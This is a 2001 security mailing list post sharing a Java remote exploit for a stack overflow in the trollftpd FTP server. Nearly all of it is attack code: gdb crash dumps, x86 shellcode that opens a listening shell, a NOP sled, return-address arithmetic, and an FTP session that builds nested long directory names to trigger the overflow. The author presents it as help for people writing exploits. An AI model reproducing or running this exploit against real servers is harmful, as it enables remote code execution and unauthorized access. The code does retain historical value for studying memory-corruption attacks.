Vulnerability Development mailing list archives
Using Java for Malicious hexcodes and stack exploits
From: KF <dotslash () snosoft com>
Date: Tue, 21 Aug 2001 05:21:36 -0400
Here is an example of how you might use java to create a remote exploit... I have seen various forms of malicious java but not much in the way of local and or remote java exploitation... I also successfully created java code to exploit local binaries if anyone is interested. Attached is a java attempt at remotely exploiting trollftpd as described by zen-parse. This code could use some TLC but my intent was only to spark conversation or to give help to those who are trying to code exploits in java. -KF
/*
code by: krfinisterre () checkfree com
java trollftpdex <return> <offset> <localhost> <user> <pass>
then ftp in and cd /tmp ls -R to invoke the overflow
Here are some gdb dumps for those of you that want edit this.
0x0804f983 in listdir (f=4, name=0xbffe9360 "./rapeme./", 'A' <repeats 190 times>...) at ls.c:510
510 if ( *r && !chdir( *r ) ) {
(gdb) bt
#0 0x0804f983 in listdir (f=4, name=0xbffe9360 "./rapeme./", 'A' <repeats 190 times>...) at ls.c:510
#19 0x0804fa0f in listdir (f=4, name=0xbfffc6f0 "./rapeme.") at ls.c:517
#20 0x0804fa0f in listdir (f=4, name=0x80524c9 ".") at ls.c:517
#21 0x08050240 in donlist (arg=0x8055127 "") at ls.c:720
#22 0x0804aadf in parser () at ftpd.c:420
#23 0x0804e8d2 in main (argc=1, argv=0xbffffa4c) at ftpd.c:1730
#24 0x4006b0de in __libc_start_main () from /lib/libc.so.6
from looking at gdb dumps the code is somewhere between these 2 locations
0xbffe9180: 'A' <repeats 190 times>, "/\220\220\220\220\220\220\220\220\220"
...
0xbffe9310: "\201~?0\201~?0\201~?0\201~?0\201~?0\201~?0\201~?0\201~?0\201~?0\205~?"
*/
import java.net.*;
import java.io.*;
import java.util.*;
public class trollftpdex
{
public static void main(String args[])
throws IOException, InterruptedException
{
// shellcode from trock.c by zen-parse runs /tmp/rapeme./AAAAAAAA.../AAAA.../UUUU
String scode =
"\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\\x80\\x89\\xc7\\x52\\x66\\x68\\x27\\x10\\x43\\x66\\x53\\x89\\xe1\\xb0\\x10\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\\xc3\\xb0\\x3f\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68\\x55\\x55\\x55\\x55\\x68\\x55\\x55\\x55\\x55\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80";
int codelen = (scode.length()/4);
// these are obviously nops
int noplen = (((254 - codelen)/2) -4) ;
String shellcode = "\\x90";
for(int x = 4; x < noplen; x++)
{
shellcode = shellcode + "\\x90";
}
shellcode = shellcode + scode;
Integer o = new Integer(args[1]);
String off = o.toString(o.intValue(), 16);
long offset = Long.parseLong(off, 16);
long esp = Long.parseLong(args[0], 16);
// What we want to eip to be
long evilreturn = esp - offset;
String evilreturn_hex_tmp = Long.toHexString(evilreturn);
String evilreturn_hex1 = evilreturn_hex_tmp.substring(0,2);
String evilreturn_hex2 = evilreturn_hex_tmp.substring(2,4);
String evilreturn_hex3 = evilreturn_hex_tmp.substring(4,6);
String evilreturn_hex4 = evilreturn_hex_tmp.substring(6,8);
String ret = evilreturn_hex4 + "\\x" + evilreturn_hex3 + "\\x" + evilreturn_hex2 + "\\x" +
evilreturn_hex1;
// heres our return addy
int addylen = ((254 - codelen)/2);
for(int x = 0; x < addylen; x=x+4)
{
shellcode = shellcode + ret ;
}
// fill an internal char array for use in string mal
CharArrayWriter pw = new CharArrayWriter(5);
StringTokenizer st = new StringTokenizer(shellcode, "\\x");
int len = st.countTokens();
for(int x = 0; x < len; x ++)
{
int nopi = Integer.parseInt(st.nextToken(), 16);
pw.write(nopi);
}
pw.flush();
pw.close();
String mal = pw.toString();
try
{
// Put the bulk of the code here.
Socket s = new Socket(args[2], 21);
System.out.print(".");
PrintStream ps = new PrintStream(s.getOutputStream());
DataInputStream dis = new DataInputStream(s.getInputStream());
ps.println("user " + args[3]);
ps.flush();
ps.println("pass " + args[4]);
ps.flush();
ps.println("mkd /tmp/rapeme.");
ps.flush();
ps.println("cwd /tmp/rapeme.");
ps.flush();
ps.println("mkd AAAAAAAAAA");
ps.flush();
ps.println("cwd AAAAAAAAAA");
ps.flush();
// 255 chars in len
for(int x = 0; x < 18; x++)
{
ps.println("mkd
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
ps.flush();
ps.println("cwd
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
ps.flush();
}
// put our payload here
ps.println("mkd " + mal);
ps.flush();
ps.println("cwd " + mal);
ps.flush();
ps.flush();
ps.println("quit");
ps.flush();
String line = null;
while( (line = dis.readLine() ) != null)
{
System.out.println(line);
line = null;
}
ps.close();
dis.close();
s.close();
}
catch(IOException e)
{
System.out.println(e);
}
}
}
Current thread:
- Using Java for Malicious hexcodes and stack exploits KF (Aug 21)